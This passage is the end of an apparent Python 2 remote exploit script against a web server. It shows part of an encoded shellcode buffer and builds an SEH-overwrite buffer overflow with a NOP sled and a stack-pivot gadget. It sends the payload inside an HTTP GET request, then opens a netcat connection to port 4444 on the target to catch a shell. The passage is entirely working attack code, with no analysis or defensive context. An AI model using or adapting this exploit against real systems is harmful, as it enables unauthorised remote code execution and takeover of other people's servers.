buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
buf += "\xc4\x25\x3d\xe9"
#Overwrite SEH handler
stackpivot = "\x5c\x60\x04\x10" #ADD ESP,0x68 + RETN
buf_len = 5250
crash = "\x90"*20 + buf + "\x41"*(2491-20-len(buf)) + stackpivot + "\x44"*(buf_len-8-2487)
request = "GET /" + crash + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)
s.close()
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + host + " 4444")